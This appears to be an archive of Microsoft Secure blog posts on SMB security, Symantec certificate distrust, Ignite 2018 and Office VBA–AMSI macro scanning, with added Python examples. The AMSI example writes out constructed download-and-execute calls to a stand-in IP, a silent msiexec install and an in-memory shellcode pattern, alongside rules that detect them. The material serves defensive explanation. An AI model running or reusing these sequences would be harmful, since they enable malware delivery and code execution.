Author Archive

Take steps to secure your business and users with our security business assessment

Businesses can no longer afford to take cybersecurity for granted. You can't read the news without seeing a splashy headline about a successful hack or data breach at a well-known company. However, this isn't just a problem for large enterprises; increasingly, small and medium-sized businesses are becoming targets of cybercriminals and need to take steps to improve their security.

Yet it can be hard for small and medium-sized businesses to right-size a security strategy for their unique business. We believe a good place to start is by answering these four questions:

  • How secure are your users and accounts?
  • How protected are you from threats?
  • How safe is your data?
  • How effectively are you managing security?

The Microsoft Security Assessment can help you discover where you are vulnerable and provide personalized recommendations to improve your security posture. Keep reading for a peek at some of our key learnings from the assessment.

How secure are your users and accounts?

In today's modern workplace, employees work from anywhere on any number of devices. This has been great for personal productivity, but it has also created more possible points of entry for attackers. One of the biggest challenges is to make it easy for your users to connect to the resources they need, from the devices they prefer, while balancing security for your company and its assets.

There are many ways to protect your accounts, but make sure you include Multi-Factor Authentication (MFA), as no password is foolproof. MFA is safer because it requires two or more forms of authentication to gain access. For example, you can require that users sign in with a password plus either a code generated by an authenticator application or a biometric, like a fingerprint or facial recognition. Products such as Microsoft 365 Business make it easy to enable MFA for your email, file storage, and productivity apps, adding another layer of defense to your organization's assets.

How protected are you from threats?

The latest figures show that cybercriminals are increasingly targeting small and medium-sized businesses alongside big businesses. Forty-one percent of businesses with fewer than 250 employees reported an attack in the last 12 months.[1] Fortunately, there are practical things you can do to reduce your exposure, and every step makes a difference.

Two recommendations that are low cost, or even free, are maintaining software update cycles and conducting regular employee training. If you don't require that employees keep software updated and patched, consider starting. Whether it is for the operating system, servers, devices, applications, plug-ins, or any other technology, timely updates remove known vulnerabilities that attackers actively exploit. You can also improve your security posture through regular employee security training. The onboarding process is a good opportunity to share cybersecurity practices, but don't stop there. Consider putting a regular security training program in place to remind employees how to detect and report suspicious links, attachments, and emails; avoid malicious websites; and download only verified applications.

How safe is your data?

One of your most valuable assets is your data. Data includes everything from a private document, to personally identifiable information, to sales projections, and more. In all cases, it will be damaging to individuals and your business if it gets into the wrong hands. You need to protect sensitive data where it lives and while it travels.

One way to safeguard critical documents is with encryption and access controls applied to the document itself. Document-level protection helps ensure that only authorized users can read and inspect privileged data, even when it is sent outside of your organization. This level of protection is available in certain products, such as Microsoft 365 Business, which also includes the ability to notify and educate users when they are working with sensitive data.

How effectively are you managing security?

A strong defense is more than just a set of tools and practices. You need a thoughtful approach to how you manage security. Effective security management will give you visibility into vulnerabilities across all your resources, and it will encourage consistency across your security policies. With a strategic approach you will better understand your current risks and be able to identify opportunities to increase your protection.

A critical component of security management is periodic review of user access to data, devices, and networks. People, roles, and responsibilities change over time, which is why it's good to know which roles have access to which resources. You can use this review to make sure that users have the right level of access, for the right time period, based on their role. For example, someone in HR might need access to the financial services database during a specific project, and only for that project. You can also make sure that those who have left your organization or changed roles have been de-provisioned, and you can investigate any suspicious activity that is detected.

Evaluate how well your business is protected

Unfortunately, it is not just the big brands that must combat cyberattacks. Small and medium-sized businesses are also at risk. We've given you a sampling of our recommended security best practices, but there is still more you may want to consider. The security assessment can help you evaluate holistically how strong your current defenses are and provide specific, actionable recommendations that you can put in place to increase your confidence and reduce your vulnerabilities.

Take the Microsoft Security Assessment and bookmark the Microsoft Secure blog to read up on the latest steps or deployment tips to keep your business safer.


[1] SMB ITDM Omnibus Survey

The post Take steps to secure your business and users with our security business assessment appeared first on Microsoft Secure.


Microsoft partners with DigiCert to begin deprecating Symantec TLS certificates

Starting in September 2018, Microsoft began deprecating the SSL/TLS capability of Symantec root certificates due to compliance issues. Google, Mozilla, and Apple have also announced deprecation plans related to Symantec SSL/TLS certificates. Symantec cryptographic certificates are used in critical environments across multiple industries. In 2017, DigiCert acquired Symantec's web security business, which included its certificate authority business.

Since the compliance issues were identified, Microsoft has been engaged with Symantec and DigiCert to uphold industry-wide compliance expectations and maintain customer trust. DigiCert created the deprecation schedule below in partnership with Microsoft to maintain trust in the industry while minimizing impact to our mutual customers.

During certificate renewal, customers must now replace their current certificate with one signed by a non-Symantec root. Based on the schedule below, Microsoft Edge and Internet Explorer running on Windows 10/Windows Server 2016 will no longer trust certificates signed by the associated root certificate if issued after the TLS NotBefore Date. Any certificates issued prior to this date will continue to be trusted until the certificate's natural expiration. Internet Explorer running on legacy Windows versions will not be impacted.

Customers with questions about their certificates or this deprecation schedule are encouraged to contact DigiCert by visiting SSL Certificate Support.

Name                                                       | Thumbprint (SHA-1)                       | Planned TLS NotBefore Date
Symantec Class 3 Public Primary Certification Authority-G6 | 26A16C235A2472229B23628025BC8097C88524A1 | 9/30/2018
thawte Primary Root CA-G2                                  | AADBBC22238FC401A127BB38DDF41DDB089EF012 | 9/30/2018
GeoTrust Universal CA                                      | E621F3354379059A4B68309D8A2F74221587EC79 | 9/30/2018
Symantec Class 3 Public Primary Certification Authority-G4 | 58D52DB93301A4FD291A8C9645A08FEE7F529282 | 1/31/2019
VeriSign Class 3 Public Primary Certification Authority-G4 | 22D5D8DF8F0231D18DF79DB7CF8A2D64C93F6C3A | 1/31/2019
GeoTrust Primary Certification Authority-G2                | 8D1784D537F3037DEC70FE578B519A99E610D7B0 | 4/30/2019
VeriSign Universal Root Certification Authority            | 3679CA35668772304D30A5FB873B0FA77BB70D54 | 4/30/2019
thawte Primary Root CA-G3                                  | F18B538D1BE903B6A6F056435B171589CAF36BF2 | 4/30/2019
GeoTrust Primary Certification Authority-G3                | 039EEDB80BE7A03C6953893B20D2D9323A4C2AFD | 4/30/2019
GeoTrust                                                   | 323C118E1BF7B8B65254E2E2100DD6029037F096 | 4/30/2019
thawte                                                     | 91C6D6EE3E8AC86384E548C299295C756C817B81 | 4/30/2019
VeriSign                                                   | 4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 | 4/30/2019
GeoTrust Global CA                                         | DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212 | 4/30/2019
VeriSign                                                   | 132D0D45534B6997CDB2D5C339E25576609B5CC6 | 4/30/2019
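
The schedule above is easiest to act on as a check you can run against your own chains. The Python below is an added example, not Microsoft's or DigiCert's tooling: it carries the table as data, normalizes the thumbprint formats that openssl, certutil and certmgr.msc emit, computes the SHA-1 thumbprint of each certificate in a PEM bundle directly from its DER bytes, and applies the rule stated above (issued prior to the date: trusted until expiry; otherwise distrusted in Edge/IE on Windows 10 and Windows Server 2016; a root not on the schedule: unaffected). Issuance on the cutoff day itself is treated as distrusted, since the text only guarantees trust for certificates issued prior to it. The sample PEM is constructed from arbitrary bytes and is not a real certificate.

```python
"""Check a certificate chain against the Symantec root distrust schedule above
(Edge / Internet Explorer on Windows 10 and Windows Server 2016). Added example."""
import base64
import hashlib
import re
from datetime import date
from typing import Dict, List

# Planned TLS NotBefore dates keyed by root SHA-1 thumbprint, copied from the table above.
DISTRUST_SCHEDULE: Dict[str, date] = {
    "26A16C235A2472229B23628025BC8097C88524A1": date(2018, 9, 30),  # Symantec Class 3 PCA-G6
    "AADBBC22238FC401A127BB38DDF41DDB089EF012": date(2018, 9, 30),  # thawte Primary Root CA-G2
    "E621F3354379059A4B68309D8A2F74221587EC79": date(2018, 9, 30),  # GeoTrust Universal CA
    "58D52DB93301A4FD291A8C9645A08FEE7F529282": date(2019, 1, 31),  # Symantec Class 3 PCA-G4
    "22D5D8DF8F0231D18DF79DB7CF8A2D64C93F6C3A": date(2019, 1, 31),  # VeriSign Class 3 PCA-G4
    "8D1784D537F3037DEC70FE578B519A99E610D7B0": date(2019, 4, 30),  # GeoTrust Primary CA-G2
    "3679CA35668772304D30A5FB873B0FA77BB70D54": date(2019, 4, 30),  # VeriSign Universal Root CA
    "F18B538D1BE903B6A6F056435B171589CAF36BF2": date(2019, 4, 30),  # thawte Primary Root CA-G3
    "039EEDB80BE7A03C6953893B20D2D9323A4C2AFD": date(2019, 4, 30),  # GeoTrust Primary CA-G3
    "323C118E1BF7B8B65254E2E2100DD6029037F096": date(2019, 4, 30),  # GeoTrust
    "91C6D6EE3E8AC86384E548C299295C756C817B81": date(2019, 4, 30),  # thawte
    "4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5": date(2019, 4, 30),  # VeriSign
    "DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212": date(2019, 4, 30),  # GeoTrust Global CA
    "132D0D45534B6997CDB2D5C339E25576609B5CC6": date(2019, 4, 30),  # VeriSign
}


def normalize_thumbprint(thumbprint: str) -> str:
    """Accept the forms tools emit: 'DE:28:F4:..', 'de28f4..', 'SHA1 Fingerprint=DE:28..',
    or the space-separated value certmgr.msc shows. Only the 40 hex digits matter."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", thumbprint.split("=")[-1]).upper()
    if len(digits) != 40:
        raise ValueError(f"not a SHA-1 thumbprint: {thumbprint!r}")
    return digits


def pem_fingerprints(pem_text: str) -> List[str]:
    """SHA-1 thumbprints of every certificate in a PEM bundle. The thumbprint is the SHA-1
    of the DER bytes, so no ASN.1 parsing is needed to match it against the table."""
    blocks = re.findall(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
                        pem_text, re.S)
    return [hashlib.sha1(base64.b64decode("".join(b.split()))).hexdigest().upper()
            for b in blocks]


def distrust_verdict(root_thumbprint: str, leaf_not_before: str) -> str:
    """Apply the rule stated above to one chain. leaf_not_before is the end-entity
    certificate's NotBefore as an ISO date (e.g. from `openssl x509 -noout -startdate`).
    Returns 'unaffected', 'trusted-until-expiry' or 'distrusted'."""
    cutoff = DISTRUST_SCHEDULE.get(normalize_thumbprint(root_thumbprint))
    if cutoff is None:
        return "unaffected"  # the chain does not terminate at a root on the schedule
    issued = date.fromisoformat(leaf_not_before)
    if issued < cutoff:
        return "trusted-until-expiry"  # issued prior to the date: trusted until it expires
    return "distrusted"  # issued on/after the date: Edge/IE on Windows 10 reject it


# Constructed stand-in for a PEM bundle (arbitrary bytes, not a real certificate).
SAMPLE_PEM = ("-----BEGIN CERTIFICATE-----\n"
              + base64.b64encode(b"constructed sample, not a certificate").decode()
              + "\n-----END CERTIFICATE-----\n")


def check_bundle(pem_text: str, leaf_not_before: str) -> List[str]:
    """Verdict for each certificate in the bundle if it were the chain's root. The one
    that matters is the root Windows actually builds the chain to, which may differ
    from the root the server sends."""
    return [distrust_verdict(tp, leaf_not_before) for tp in pem_fingerprints(pem_text)]


if __name__ == "__main__":
    # GeoTrust Global CA root, leaf issued after 4/30/2019 -> distrusted
    print(distrust_verdict("DE:28:F4:A4:FF:E5:B9:2F:A3:C5:03:D1:A3:49:A7:F9:96:2A:82:12",
                           "2019-05-15"))
    print(check_bundle(SAMPLE_PEM, "2019-05-15"))
```

Feed it the chain you actually serve (for example the output of `openssl s_client -showcerts`) plus the leaf's NotBefore; a verdict of distrusted means the renewal must move to a non-Symantec root now rather than at expiry. Remember that Windows builds its own chain from its trust store, so the authoritative check is the root in the chain the client constructs, not necessarily the one in the server's bundle.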




Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more

What a week it was in Orlando! Ignite is always a biggie, and this one was no exception. For all of us here at Microsoft who get to work on security, spending time with customers to learn how you are using our security products today and to share new innovations to come is a highlight. At this year’s event we put even greater emphasis on providing attendees with access to engineering experts throughout more than one hundred focused sessions, workshops, and hands-on immersion experiences for the latest technologies in security. I was chuffed to see that our security booths at the center of the expo hall were chock-a-block for the whole event. Thank you to everyone who stopped by, attended our social and community events, and connected with our engineers and product managers.

After their security blanket work at the RSA Conference earlier this year, our social team once again took a shot at peak swag. Our Security SOCs were the result, lovingly designed and then crafted from the finest combed cotton, bringing fashion together with a six-month Enterprise Mobility + Security trial; quite the combination.

Show us your own fashion moment through social media with #askmeaboutmySOC #showmeyourSOC.

More seriously, if you weren’t able to join us this year, or found yourself trading off between sessions or workshops at the show, don’t worry, our breakout sessions on security are available on-demand. At Ignite 2018, we also brought a deep lineup of new security innovations that I have summarized below, along with some top session recommendations:

Identity and access management

We really don't like passwords, so together we want to help you eliminate their use through simpler, more secure alternatives. New support for passwordless sign-in to Azure Active Directory (Azure AD) connected apps, both cloud and on-premises, through the Microsoft Authenticator app can help you replace passwords with a more secure, multi-factor sign-in that can reduce the risk of account compromise by 99.9 percent and significantly simplify the user experience. Watch the Ignite session: Getting to a world without passwords.

We also announced two powerful new features in our set of identity governance capabilities for Azure AD to help automate the process of granting access to employees and partners: Entitlement Management and My Access. Watch the Ignite session: Govern access to your resources with Azure AD identity governance. And read more about identity and access management announcements.

Information protection

As you move more of your workloads to the cloud, meeting information security and compliance standards needs a new approach. Azure is the first cloud platform to offer confidentiality and integrity of data while in use, adding to the protections already in place that help keep your data secure in transit and at rest. Azure confidential computing will be available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments built on Intel SGX to protect data while it's being computed. Watch the Ignite session: Protection by design: Intel SGX and Azure Confidential Computing.

We've also rolled out a new unified labeling experience in the Security & Compliance Center in Microsoft 365 that delivers a single, integrated approach to creating data sensitivity and data retention labels. You can preview new labeling capabilities that are built into Office apps across all major platforms and new extensions of labeling and protection capabilities to PDFs. The Microsoft Information Protection SDK, now generally available, enables other software creators to build applications that understand, apply, and act on Microsoft sensitivity labels so you can have more cohesive information protection. Read more about the information protection announcements and watch the Ignite session.

Threat protection

Microsoft Threat Protection, announced at Ignite last week, is an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure. This new integration in the Microsoft 365 admin console combines signal across all of Office 365 Advanced Threat Protection (ATP), Windows Defender ATP, Microsoft Cloud App Security, Azure AD Identity Protection, and the Azure Security Center to help you secure across your digital estate. The portal not only provides alerts and monitoring of threats, but also gives you the ability to make real-time policy changes to help your security strategy stay ahead of changing threats. Read more about Microsoft Threat Protection or watch the Ignite session.

Microsoft Cloud App Security can now leverage the traffic information collected by Windows Defender Advanced Threat Protection about the cloud apps and services being accessed from IT-managed Windows 10 devices. This native integration gives admins a more complete view of cloud usage in their organization and simplifies investigations. Read more about this integration or watch the Ignite session.

Security management

To help you strengthen your security posture, you'll want to understand your current position and where to go from there. Microsoft Secure Score is a dynamic report card for your cybersecurity posture. Organizations that use the Secure Score assessments and recommendations typically reduce their chance of a breach by 30-fold. Microsoft Secure Score provides guidance to improve your security posture. For example, Secure Score can recommend securing your admin accounts with Multi-Factor Authentication (MFA), securing users' accounts with MFA, and turning off client-side email forwarding rules. Starting today, we're expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for hybrid cloud workloads in the Azure Security Center, so you can have full visibility across your organization's entire estate. Read more about Microsoft Secure Score or watch the Ignite session.

Unified endpoint management

Customers using System Center Configuration Manager and Microsoft Intune to manage their existing infrastructure benefit immediately from the scale, reliability, and security of the cloud. We announced new capabilities for unified endpoint management (UEM) at Ignite to empower IT to secure your data across a variety of devices and platforms, and to help you deliver intuitive and native user experiences for Windows 10, iOS, and Android devices. Read more about all the UEM advancements or watch the Ignite session.

Looking ahead

Working closely with customers is at the center of our ability to innovate and evolve our security technologies. Ignite is a top-notch opportunity to build the security community. It doesn't stop there, though. We are always interested in your feedback as we roll out new capabilities, so do join us and have your voice heard via the Tech Community.



Get deeper into security at Microsoft Ignite 2018

This year at Microsoft Ignite, we will be making some exciting announcements, from new capabilities for identity management and information protection to powerful artificial intelligence (AI) innovations that can help you stay ahead of an often overwhelming surge in threats and security alerts.

Join us as we share best practices for current products, reveal highlights of our new offerings, and give you a glimpse of our future product vision.

Start by attending Satya Nadella's keynote. Then kickstart your security journey with this session: Microsoft Security: How the cloud helps us all be more secure, featuring Rob Lefferts (GS008). We'll highlight what's new in Microsoft security and how our customers and partners are using the Microsoft Cloud to accelerate security and productivity. Watch our demo showcase to see for yourself how unique intelligence and new innovations from Microsoft can help you be more secure across your entire digital estate.

Here are just a few of the other sessions at Ignite that will showcase our security technology and the innovation we have invested in throughout 2018 and into 2019. Add them to your Session Scheduler and check out the Session Catalog for the full list. If you can't attend in person, you can watch the live stream starting on September 24, with on-demand sessions to follow.

  • Leveraging the power of Microsoft threat protection (BRK4000). Learn about the services that make up Microsoft threat protection and how they work together across data, endpoints, identities, and infrastructure.
  • Double your security team productivity without doubling capacity (BRK2251). Learn how automated threat protection and remediation works seamlessly out of the box, using AI to respond to alerts and help security teams solve capacity and skill-gap challenges.
  • How to build security applications using the Microsoft Graph Security API (WRK3006). The Microsoft Graph has been extended with a new Security Graph API. Join this lab to get started using the Security API, including creating and authenticating a new app and using sample code to query the API.
  • Azure Active Directory: New features and roadmap (BRK2254). Come to this can’t-miss session for anyone working with or considering their strategy for identity and access management in the cloud. Hear about the newest features and experiences across identity protection, conditional access, single sign-on, hybrid identity environments, managing partner and customer access, and more.
  • Using Microsoft Secure Score to harden your security position (BRK3247). In this session, we help you understand what your current security position is in products like Office 365 and Windows and show you how you can easily increase your position though the built-in recommendations.
  • Getting to a world without passwords (BRK3031). Get the latest info and demos on what’s new with FIDO2, WebAuthN, Azure Active Directory, Windows Hello, and Microsoft Authenticator to help you make passwords a relic of the past.
  • Accelerate deployment and adoption of Azure Information Protection (BRK3009). Learn all about best practices in deploying Azure Information Protection to help protect your sensitive data, wherever it lives or travels.
  • Registering and managing apps through Microsoft Azure Portal and Microsoft Graph API (THR2079). Come learn how to register apps to sign in with Azure AD and personal Microsoft accounts, manage these apps, and get access to APIs, all through the Azure Portal, Microsoft Graph API, and PowerShell.
  • Secure enterprise productivity with Office 365 threat protection services (BRK4001). Learn about the latest advances in services such as Exchange Online Protection (EOP), Advanced Threat Protection (ATP), and Threat Intelligence, and get a detailed roadmap of what's to come.
  • Simplify your IT management and level up with Microsoft 365 (GS004). Come and learn how Microsoft 365 will help you simplify your modern workplace, delight and empower your users, and protect and secure your corporate assets.
  • Managing devices with Microsoft Intune: what's new (BRK3036). Learn how Intune raises the bar once again for Android, Apple, and Windows device management, and hear more about the exciting new features and new use cases announced at Ignite.
  • Elevate the security for all your cloud apps and services with the Microsoft Cloud App Security (CASB) solution (BRK2158). Gain visibility into your cloud apps and services with sophisticated analytics to identify and combat cyberthreats, and control how your ubiquitous data travels.

And one other exciting note: To see our solutions in action and gain access to a 6-month free trial of our EMS E5 solution, be sure to stop by the Microsoft Showcase for in-depth product demos and discussions with security experts.

For more Ignite news and updates, check back to our Secure Blog as we continue to highlight specific sessions and topics throughout the week.



Office VBA + AMSI: Parting the veil on malicious macros

As part of our continued efforts to tackle entire classes of threats, Office 365 client applications now integrate with Antimalware Scan Interface (AMSI), enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior.

Macro-based threats have always been a prevalent entry point for malware, but we have observed a resurgence in recent years. Continuous improvements in platform and application security have led to the decline of software exploits, and attackers have found a viable alternative infection vector in social engineering attacks that abuse functionality like VBA macros. Microsoft, along with the rest of the industry, observed attackers transition from exploits to using malicious macros to infect endpoints. Malicious macros have since shown up in commodity malware campaigns, targeted attacks, and red-team activities.
Figure 1. Prevalence of the exploit vs macro attack vector observed via Windows Defender ATP telemetry

To counter this threat, we invested in building better detection mechanisms that expose macro behavior through runtime instrumentation within our threat protection solutions in the cloud. We're bringing this instrumentation directly into Office 365 client applications. More importantly, we're exposing this capability through AMSI, an open interface, making it accessible to any antivirus solution.

Obfuscation and other forms of detection evasion

Macros are popular among attackers because of the rich capabilities that the VBA runtime exposes and the privileged context in which macros execute. Notably, as with all scripting languages, attackers have another advantage: they can hide malicious code through obfuscation.

To evade detection, malware needs to hide intent. The most common way that attackers do this is through code obfuscation. Macro source code is easy to obfuscate, and a plethora of free tools are available to do this automatically. The result is polymorphic malware, with evolving obfuscation patterns and multiple obfuscated variants of the same malicious macro.

There's more: malicious code can be moved out of the macro source and hidden in other document components like text labels, forms, Excel cells, and others. Or why hide at all? A small piece of malicious code can be embedded somewhere in a huge legitimate source and keep a low profile.

How can antivirus and other security solutions cope? Today, antivirus solutions can extract and scan the obfuscated macro source code from an Office document, but scanning the source alone does not reveal intent. How can the macro's intent be exposed? What if security solutions could observe a macro's behavior at runtime and gain visibility into its system interactions? Enter Office and AMSI integration.

AMSI on Windows 10

If AMSI rings a bell, it's because we talked about how PowerShell adopted AMSI in a blog post when AMSI was introduced back in 2015.

Antimalware Scan Interface (AMSI) is an open interface available on Windows 10 for applications to request, at runtime, a synchronous scan of a memory buffer by an installed antivirus or security solution. Any application can interface with AMSI and request a scan for any data that may be untrusted or suspicious.

Any antivirus can become an AMSI provider and inspect data sent by applications via the AMSI interface. If the content submitted for scan is detected as malicious, the requesting application can take action to deal with the threat and ensure the safety of the device. To learn more, refer to the AMSI documentation.

AMSI also integrates with the JavaScript, VBScript, and PowerShell scripting engines. Over the years, we have been steadily increasing our investments in providing security solutions with deeper visibility into script-based threats. Insights seen via AMSI are consumed by our own security products. The new Office and AMSI integration is yet another addition to the arsenal of protection against script-based malware. Windows Defender Advanced Threat Protection (Windows Defender ATP) leverages AMSI and machine learning to combat script-based threats that live off the land (read our previous blog post to learn more).

Office VBA integration with AMSI

The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection.

Figure 2. Runtime scanning of macros via AMSI

Logging macro behavior

The VBA language offers macros a rich set of functions that can be used to interface with the operating system to run commands, access the file system, etc. Additionally, it allows direct calls to COM methods and Win32 APIs. The VBA scripting engine handles calls from macro code to COM and APIs via internal interfaces that implement the transition between the caller and the callee. These interfaces are instrumented such that the behavior of a macro is trapped and all relevant information, including the function name and its parameters, is logged in a circular buffer.

This monitoring is not tied to specific functions; its generic and works on any COM method or Win32 API. The logged calls can come in two formats:

  • <COM_Object>.<COM_Method>(Parameter 1, ..., Parameter n);
  • <API_or_function_Name>(Parameter 1, ..., Parameter n);

Invoked functions, methods, and APIs need to receive their parameters in the clear (plaintext) in order to work; thus, this behavioral instrumentation is not affected by obfuscation. The instrumentation exploits a weak spot of obfuscated macro code: the antivirus now has visibility into the relevant activity of the macro in the clear.

To illustrate, consider the following string obfuscation in a shell command:

Shell("ma" + "l" + "wa" + "r" + "e.e" + "xe")

With the Office VBA and AMSI integration, the argument has already been concatenated by the time the call is trapped, so the behavior log records it in the clear:

Shell(malware.exe);
Triggering on suspicious behavior

When a potentially high-risk function or method (a trigger; for example, CreateProcess or ShellExecute) is invoked, Office halts the execution of the macro and requests a scan of the macro behavior logged up to that moment, via the AMSI interface. The AMSI provider (e.g., antivirus software) is invoked synchronously and returns a verdict indicating whether or not the observed behavior is malicious.

The list of high-risk functions, or triggers, is meant to cover actions at various stages of an attack chain (e.g., payload download, persistence, execution, etc.); triggers are selected based on their prevalence among malicious versus benign macros. The behavior log sent over AMSI can include information like suspicious URLs from which malicious data was downloaded, suspicious file names known to be associated with malware, and others. This data is valuable in determining whether the macro is malicious, as well as in creating detection indicators, all unaffected by obfuscation.

Stopping malicious macros upon detection

If behavior is assessed malicious, macro execution is stopped. The user is notified by the Office application, and the application session is shut down to avoid any further damage. This can stop an attack in its tracks, protecting the device and user.

Figure 3. Malicious macro notification

Case study 1: Heavily obfuscated macro code

(SHA-256: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd)

To illustrate how the Office VBA and AMSI integration can expose malicious macro code, let's look at a recent social engineering attack that uses macro-based malware. The initial vector is a Word document with instructions in the Chinese language to Enable content.

Figure 4: The malicious document instructs to enable the content

If the recipient falls for the lure and enables content, the malicious macro code runs and launches a command to download the payload from a command-and-control server controlled by the attacker. The payload, an installer file, is then run.

The macro code is heavily obfuscated:

Figure 5: Obfuscated macro

However, behavior monitoring is not hindered by obfuscation. It produces the following log, which it passes to AMSI for scanning by antivirus:

Figure 6: De-obfuscated behavior log

The action carried out by the macro code is logged, clearly exposing malicious actions that antivirus solutions can detect much more easily than if the code was obfuscated.

Case study 2: Macro threat that lives off the land

(SHA-256: 7952a9da1001be95eb63bc39647bacc66ab7029d8ee0b71ede62ac44973abf79)

The following is an example of macro malware that lives off the land, which means that it stays away from the disk and uses common tools to run code directly in memory. In this case, it uses shellcode written into dynamically allocated memory pages. Like the previous example, this attack uses social engineering to get users to click Enable Content and run the macro code, but this one uses instructions in the Spanish language in an Excel workbook.

Figure 7. Malicious Excel file with instructions to enable content

When run, the macro code dynamically allocates virtual memory, writes shellcode to the allocated location, and uses a system callback to transfer execution control to it. The malicious code thus runs fileless, memory-resident without a file on disk.

Figure 8. Macro code utilizing Win32 APIs to launch embedded shellcode

When the shellcode gets execution control, it launches a PowerShell command to download additional payload from a command-and-control server controlled by the attacker.

Figure 9. PowerShell command that downloads payload

Even though the macro uses a fileless code execution technique based on shellcode, its behavior is exposed to antivirus solutions via the AMSI interface. A sample log is shown below:

Figure 10. De-obfuscated behavior log

With the AMSI scan integration in both Office VBA and PowerShell, security solutions like Windows Defender ATP can gain clear visibility into malicious behavior at multiple levels and successfully block attacks.
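
The three-part flow described above (log every COM/API call into a circular buffer, halt at a trigger and hand the log to the AMSI provider synchronously, stop the macro on a malicious verdict) and the two behavior patterns from the case studies, modeled as an added Python example. This is not Office's instrumentation nor any vendor's AMSI provider: the trigger set beyond CreateProcess and ShellExecute, the Win32 API names in the constructed call sequences (URLDownloadToFileA, VirtualAlloc, RtlMoveMemory, CallWindowProcA), the sample URL and paths, and the two detection rules are all assumptions made for illustration. What it does show is the property the post relies on: the log holds the arguments as the callee received them, so the rules never have to see through obfuscation.

```python
"""Toy model of the Office VBA + AMSI flow: instrumented calls are written to a circular
buffer, a high-risk call halts the macro and hands the log to an AMSI provider, and a
malicious verdict stops the macro. Added example; trigger set, API names, sample data and
detection rules are constructed for illustration, not Office's or any provider's own."""
from collections import deque
import re
from typing import Callable, Deque, Iterable, List, Optional, Sequence, Tuple

# Calls that halt the macro and request a scan of the behavior log. The page names
# CreateProcess and ShellExecute; the other two are assumptions for this example.
TRIGGERS = {"CreateProcess", "ShellExecute", "Shell", "CallWindowProcA"}


def format_entry(name: str, params: Sequence[object]) -> str:
    """One log line in the two shapes described above:
    <COM_Object>.<COM_Method>(p1, ..., pn);  or  <API>(p1, ..., pn);
    Parameters are logged as the callee receives them, i.e. already de-obfuscated."""
    return f"{name}({', '.join(str(p) for p in params)});"


class MacroBlocked(Exception):
    """Raised when the provider returns a malicious verdict at a trigger."""


class MacroRuntime:
    def __init__(self, provider: Callable[[List[str]], Optional[str]],
                 buffer_size: int = 64) -> None:
        self.log: Deque[str] = deque(maxlen=buffer_size)  # circular buffer of behavior
        self.provider = provider

    def call(self, name: str, *params: object) -> None:
        self.log.append(format_entry(name, params))
        if name.split(".")[-1] in TRIGGERS:
            # Synchronous scan of everything logged so far; the macro is halted meanwhile.
            reason = self.provider(list(self.log))
            if reason is not None:
                raise MacroBlocked(reason)


def behavior_provider(entries: List[str]) -> Optional[str]:
    """A minimal provider-style verdict over the clear-text behavior log.
    Returns a reason string if malicious, None if benign."""
    joined = "\n".join(entries)
    # Rule 1: a file fetched from a URL, then that same path handed to an execution API.
    download = re.search(r"URLDownloadToFileA\(\d+, https?://[^,]+, ([^,]+),", joined)
    if download:
        fetched = re.escape(download.group(1))
        if re.search(rf"(Shell|CreateProcess|ShellExecute)\(.*{fetched}", joined):
            return "download-and-execute: " + download.group(1)
    # Rule 2: RWX memory allocated (64 = PAGE_EXECUTE_READWRITE), bytes copied into it,
    # then an API that takes a code pointer invoked.
    rwx = re.search(r"VirtualAlloc\([^)]*, 64\);", joined)
    if rwx and "RtlMoveMemory(" in joined and "CallWindowProcA(" in joined:
        return "shellcode: RWX alloc + copy + callback execution"
    return None


def run_macro(steps: Iterable[Tuple[str, Tuple[object, ...]]]) -> Tuple[str, List[str]]:
    """Drive a sequence of instrumented calls. Returns ('blocked: <reason>' or 'completed',
    behavior log)."""
    rt = MacroRuntime(behavior_provider)
    try:
        for name, params in steps:
            rt.call(name, *params)
    except MacroBlocked as exc:
        return f"blocked: {exc}", list(rt.log)
    return "completed", list(rt.log)


# Constructed behavior sequences (not the page's samples). The string concatenation in the
# first one is resolved before the call, so the log receives the plain value, as the callee does.
DOWNLOAD_AND_RUN = [
    ("URLDownloadToFileA", (0, "http://198.51.100" + ".7/set" + "up.msi",
                            "C:\\Users\\Public\\setup.msi", 0, 0)),
    ("Shell", ("msi" + "exec /i C:\\Users\\Public\\setup.msi /qn", 0)),
]
SHELLCODE_IN_MEMORY = [
    ("VirtualAlloc", (0, 4096, 0x3000, 0x40)),
    ("RtlMoveMemory", (0x1A0000, "<4096 bytes of shellcode>", 4096)),
    ("CallWindowProcA", (0x1A0000, 0, 0, 0, 0)),
]
BENIGN_REPORT = [
    ("Worksheets.Range.Value", ("Q3 total",)),
    ("ActiveWorkbook.Save", ()),
    ("Shell", ("notepad.exe C:\\Reports\\q3.txt", 1)),  # trigger fires; verdict is benign
]

if __name__ == "__main__":
    for label, steps in (("download", DOWNLOAD_AND_RUN), ("shellcode", SHELLCODE_IN_MEMORY),
                         ("benign", BENIGN_REPORT)):
        verdict, log = run_macro(steps)
        print(label, "->", verdict)
        for line in log:
            print("   ", line)
```

Running it prints the three verdicts with their behavior logs. Note that the benign sequence also hits a trigger (Shell) and gets scanned; the trigger only decides when the provider is asked, the provider decides the verdict, which is why the trigger list can be broad without generating false positives by itself.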

Windows Defender ATP: Force multiplier and protection for down-level platforms

In addition to protecting users running Office 365 applications on Windows 10, detections via AMSI allow modern endpoint protection platforms like Windows Defender ATP to extend protection to customers via the cloud.

Figure 11. Simplified diagram showing how AMSI detections in a few machines are extended to other customers via the cloud

In Windows Defender AV's cloud-delivered antivirus protection, the Office VBA and AMSI integration enriches the signals sent to the cloud, where multiple layers of machine learning models classify and make verdicts on files. When devices encounter documents with suspicious macro code, Windows Defender AV sends metadata and other machine learning features, coupled with signals from Office AMSI, to the cloud. Verdicts by machine learning translate to real-time protection for the rest of Windows Defender AV customers with cloud protection enabled.

